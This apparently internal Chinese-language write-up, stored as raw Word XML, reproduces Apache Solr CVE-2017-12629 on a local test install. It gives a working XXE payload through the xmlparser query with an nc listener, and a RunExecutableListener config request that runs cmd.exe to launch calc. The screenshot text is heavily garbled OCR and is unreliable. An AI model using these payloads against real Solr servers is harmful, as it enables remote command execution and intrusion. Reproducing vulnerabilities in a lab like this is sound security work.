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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>solr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10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20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16:16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受影响的版本：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Solr 5.5.0 to 5.5.4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Solr 6.0.0 to 6.6.1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Solr 7.0.0 to 7.0.1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复现过程：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采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Solr 7.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行复现。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下载地址：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hyperlink r:id="rId6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://apache.mirror.rafal.ca/lucene/solr/7.0.1/solr-7.0.1.zip</w:t>
        </w:r>
      </w:hyperlink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一、运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>solr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解压之后，进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目录，执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs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solr.cmd stop -all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4781550" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="图片 1" descr="计算机生成了可选文字:&#10;D八work\venus\solr\solr一7.0.1\bin&gt;solr.clndstop一all&#10;StoppingSolrprocesg18588rLulningonport8983&#10;等待O秒，按一个键继续．。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D八work\venus\solr\solr一7.0.1\bin&gt;solr.clndstop一all&#10;StoppingSolrprocesg18588rLulningonport8983&#10;等待O秒，按一个键继续．。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二、添加数据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访问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hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://localhost:8983/solr/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，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然后添加一个叫做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>solr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> collection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514725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2" name="图片 2" descr="计算机生成了可选文字:&#10;令&#10;0一。‘oca,host:8983/50'r/#l一co&quot;ec,'ons/50‘『&#10;口&#10;AddCollection&#10;l，·，·」&#10;心Reload沙&#10;nallle:&#10;Olr&#10;.Dashboard&#10;confiQset:&#10;曰Logging&#10;nUmshardS:1&#10;C10Ud&#10;ColledionS&#10;Javaproperties&#10;吞ThreadDump&#10;replicationFact.1&#10;ShOW日dvanCed曰&#10;＼。犷Add。。：e。‘。n&#10;de&#10;言色函&#10;X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令&#10;0一。‘oca,host:8983/50'r/#l一co&quot;ec,'ons/50‘『&#10;口&#10;AddCollection&#10;l，·，·」&#10;心Reload沙&#10;nallle:&#10;Olr&#10;.Dashboard&#10;confiQset:&#10;曰Logging&#10;nUmshardS:1&#10;C10Ud&#10;ColledionS&#10;Javaproperties&#10;吞ThreadDump&#10;replicationFact.1&#10;ShOW日dvanCed曰&#10;＼。犷Add。。：e。‘。n&#10;de&#10;言色函&#10;XCan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三、验证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 xml:space="preserve">xxe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞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、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>端口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、浏览器访问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hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://localhost:8983/solr/solr/select?q={!xmlparser</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> v='&lt;!DOCTYPE a SYSTEM "</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://localhost:4444/hello-liehu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"&gt;&lt;a&gt;&lt;/a&gt;'}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nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以成功收到数据，证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明漏洞存在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1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="计算机生成了可选文字:&#10;八tools\nmap一7.01&gt;ncat.exe一Iv4444&#10;cat:Versi。n7.01(https://nxnap．。rg/ncat)&#10;cat:Listeningon:::4444&#10;cat:Listeningon0.0.0.0:4444&#10;cat:Connectionfrom127.0.0.1.&#10;cat:Connectionfrom127.0.0.1:63153.&#10;ET/hello一liehu盯TP/1.1&#10;ser一Agent:Java/1.8.0_112&#10;ost:localhost:4444&#10;ccept:text/ht血，ilnage/gif,ilnage/jpeg,*;q二．2,*/*;q二．2&#10;onnection:keep一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八tools\nmap一7.01&gt;ncat.exe一Iv4444&#10;cat:Versi。n7.01(https://nxnap．。rg/ncat)&#10;cat:Listeningon:::4444&#10;cat:Listeningon0.0.0.0:4444&#10;cat:Connectionfrom127.0.0.1.&#10;cat:Connectionfrom127.0.0.1:63153.&#10;ET/hello一liehu盯TP/1.1&#10;ser一Agent:Java/1.8.0_112&#10;ost:localhost:4444&#10;ccept:text/ht血，ilnage/gif,ilnage/jpeg,*;q二．2,*/*;q二．2&#10;onnection:keep一al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四、验证命令执行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、新建一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Hunter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的集合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hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://localhost:8983/solr/admin/collections?action=CREATE&amp;name=Hunter&amp;numShards=2&amp;maxShardsPerNode=2</w:t>
        </w:r>
      </w:hyperlink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、为集合添加一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RunExecutableListener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>器，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其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>属性内容为运行命令的名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>("cmd.exe")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，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"dir"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>属性内容为路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs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C:/Windows/System32/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"args"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>属性内容为命令参数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7658100" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4" name="图片 4" descr="计算机生成了可选文字:&#10;CanCel&#10;困困巨困&#10;Target:http:Hlocalhost:8983&#10;团匹&#10;Response&#10;RaW}ParamS}HeaderS}HeX&#10;垫”毛Headers卜x}__&#10;HTTP/1.1200OK&#10;Content一Type:text/plain;charset二utf一8&#10;Connection:close&#10;,responseHeader&quot;:&#10;,status':0&#10;.QTime&quot;:506),&#10;,WARNING&quot;:&quot;Thisresponseformat15experimental.It15likelyto&#10;changeinthefuture.'&#10;们脚利&#10;POST/50lr/Hunter/configHTTP八．1&#10;Host:localhost:8983&#10;Lser一Agent：、lozilla/5.0(WindowsNT10.0;W0W64;ry:56.0)Gecko/20100101Firefox/56.0&#10;Accept:text/html,application八html+xml.application/xml;q二0.9,＊厂＊;q二0.8&#10;Accept一Language:zh一CN,zh:q二0.8,en一US:q二0.5,en:q二0.3&#10;Accept一Encoding:gzip,deflate&#10;Connection:close&#10;LTpgrade一Insecure一Requests:l&#10;Content一Type:application/json&#10;Content一Length:215&#10;.add卜11stener&quot;:{&#10;.event&quot;:&quot;postCo脚it&quot;,&#10;一name.:.newlistener'.&#10;,class&quot;:&quot;solr.RunExecutableListener&quot;.&#10;,exe&quot;:&quot;cmd.exe&quot;.&#10;,dir&quot;:'C:/Windows/System32/.,&#10;at-gs:&#10;&quot;/c',&quot;calc．」&#10;\&#10;匕共面石爪瓦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CanCel&#10;困困巨困&#10;Target:http:Hlocalhost:8983&#10;团匹&#10;Response&#10;RaW}ParamS}HeaderS}HeX&#10;垫”毛Headers卜x}__&#10;HTTP/1.1200OK&#10;Content一Type:text/plain;charset二utf一8&#10;Connection:close&#10;,responseHeader&quot;:&#10;,status':0&#10;.QTime&quot;:506),&#10;,WARNING&quot;:&quot;Thisresponseformat15experimental.It15likelyto&#10;changeinthefuture.'&#10;们脚利&#10;POST/50lr/Hunter/configHTTP八．1&#10;Host:localhost:8983&#10;Lser一Agent：、lozilla/5.0(WindowsNT10.0;W0W64;ry:56.0)Gecko/20100101Firefox/56.0&#10;Accept:text/html,application八html+xml.application/xml;q二0.9,＊厂＊;q二0.8&#10;Accept一Language:zh一CN,zh:q二0.8,en一US:q二0.5,en:q二0.3&#10;Accept一Encoding:gzip,deflate&#10;Connection:close&#10;LTpgrade一Insecure一Requests:l&#10;Content一Type:application/json&#10;Content一Length:215&#10;.add卜11stener&quot;:{&#10;.event&quot;:&quot;postCo脚it&quot;,&#10;一name.:.newlistener'.&#10;,class&quot;:&quot;solr.RunExecutableListener&quot;.&#10;,exe&quot;:&quot;cmd.exe&quot;.&#10;,dir&quot;:'C:/Windows/System32/.,&#10;at-gs:&#10;&quot;/c',&quot;calc．」&#10;\&#10;匕共面石爪瓦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、更新集合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"Hunter"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RunExecutableListener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的执行。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提交更新后，等一段时间后接收到请求包。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829675" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="计算机生成了可选文字:&#10;can。：J区困巨&#10;&gt;.,&#10;口&#10;X&#10;匕&#10;Response&#10;程序员&#10;RaW}ParamS}Headers}HeX}XML&#10;RaW}Headers}HeX}XML&#10;POST/solr/Hunter/update&#10;Host:localhost:8983&#10;0&#10;0000&#10;User一Agent：、lozilla/5.&#10;F1refox/56.0&#10;Accept:*/*&#10;Accept一Language:zh一CN&#10;Accept一Encoding:gzip,&#10;Connection:close&#10;0&#10;HTTP/1.&#10;N&#10;NT10.0;W0W64;ry:56.0)Gecko/20100101&#10;HTTP/1.1200OK&#10;Content一Type:application/xml:&#10;Connection:close&#10;,zh;q二0.8,en一US:q二0.5,en:q二0.3&#10;deflate&#10;&lt;?xm1version二’1.0&quot;encoding二’&#10;&lt;response&gt;&#10;Upgrade一Insecure一Requests:&#10;Content一Type:text八ml&#10;Content一Length:77&#10;&lt;lstn胡e二”responseHeader&quot;&gt;&#10;&lt;intname二．status.&gt;0灯八nt&gt;&#10;&lt;intname二”QTime&quot;&gt;13＜八nt&gt;&#10;&lt;/lst&gt;&#10;&lt;/response&gt;&#10;:o:&#10;QWO&#10;比h&#10;Or&#10;器&#10;礴三眠DEcocTBIN}:E:&#10;And&#10;&lt;add&gt;&#10;寸&#10;CE&#10;C&#10;烟&#10;shod&#10;RM&#10;l’户se-L．』．.........&#10;&lt;doc&gt;&#10;&lt;f1e1dn舰e二‘authors&quot;&gt;PatrickEagar&lt;/field&gt;&#10;B&#10;7&#10;8&#10;9&#10;X&#10;&lt;/doc&gt;&#10;&lt;/add&gt;&#10;U&#10;4&#10;S&#10;6&#10;,.,，已巾j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can。：J区困巨&#10;&gt;.,&#10;口&#10;X&#10;匕&#10;Response&#10;程序员&#10;RaW}ParamS}Headers}HeX}XML&#10;RaW}Headers}HeX}XML&#10;POST/solr/Hunter/update&#10;Host:localhost:8983&#10;0&#10;0000&#10;User一Agent：、lozilla/5.&#10;F1refox/56.0&#10;Accept:*/*&#10;Accept一Language:zh一CN&#10;Accept一Encoding:gzip,&#10;Connection:close&#10;0&#10;HTTP/1.&#10;N&#10;NT10.0;W0W64;ry:56.0)Gecko/20100101&#10;HTTP/1.1200OK&#10;Content一Type:application/xml:&#10;Connection:close&#10;,zh;q二0.8,en一US:q二0.5,en:q二0.3&#10;deflate&#10;&lt;?xm1version二’1.0&quot;encoding二’&#10;&lt;response&gt;&#10;Upgrade一Insecure一Requests:&#10;Content一Type:text八ml&#10;Content一Length:77&#10;&lt;lstn胡e二”responseHeader&quot;&gt;&#10;&lt;intname二．status.&gt;0灯八nt&gt;&#10;&lt;intname二”QTime&quot;&gt;13＜八nt&gt;&#10;&lt;/lst&gt;&#10;&lt;/response&gt;&#10;:o:&#10;QWO&#10;比h&#10;Or&#10;器&#10;礴三眠DEcocTBIN}:E:&#10;And&#10;&lt;add&gt;&#10;寸&#10;CE&#10;C&#10;烟&#10;shod&#10;RM&#10;l’户se-L．』．.........&#10;&lt;doc&gt;&#10;&lt;f1e1dn舰e二‘authors&quot;&gt;PatrickEagar&lt;/field&gt;&#10;B&#10;7&#10;8&#10;9&#10;X&#10;&lt;/doc&gt;&#10;&lt;/add&gt;&#10;U&#10;4&#10;S&#10;6&#10;,.,，已巾j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E30B1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参考：</w:t>
      </w:r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hyperlink r:id="rId16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://lucene.472066.n3.nabble.com/ANNOUNCE-SECURITY-CVE-2017-12629-Several-critical-vulnerabilities-discovered-in-Apache-Solr-XXE-amp--td4359402.html</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://liehu.tass.com.cn/archives/861</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00E30B1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16" w:rsidRDefault="00E30B16" w:rsidP="00E30B16">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E30B16" w:rsidRDefault="00E30B16" w:rsidP="00E3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16" w:rsidRDefault="00E30B16" w:rsidP="00E30B16">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E30B16" w:rsidRDefault="00E30B16" w:rsidP="00E30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30B16"/>
    <w:rsid w:val="00E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614717-784E-42A1-B1DB-01D5529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E3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0B1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0B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0B1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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8983/solr/admin/collections?action=CREATE&amp;name=Hunter&amp;numShards=2&amp;maxShardsPerNode=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iehu.tass.com.cn/archives/8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ucene.472066.n3.nabble.com/ANNOUNCE-SECURITY-CVE-2017-12629-Several-critical-vulnerabilities-discovered-in-Apache-Solr-XXE-amp--td435940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apache.mirror.rafal.ca/lucene/solr/7.0.1/solr-7.0.1.zip" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:4444/hello-liehu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8983/solr/solr/select?q=%7b!xmlparser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沈海涛[技术中心]</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>沈海涛[技术中心]</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-20T09:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-20T09:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>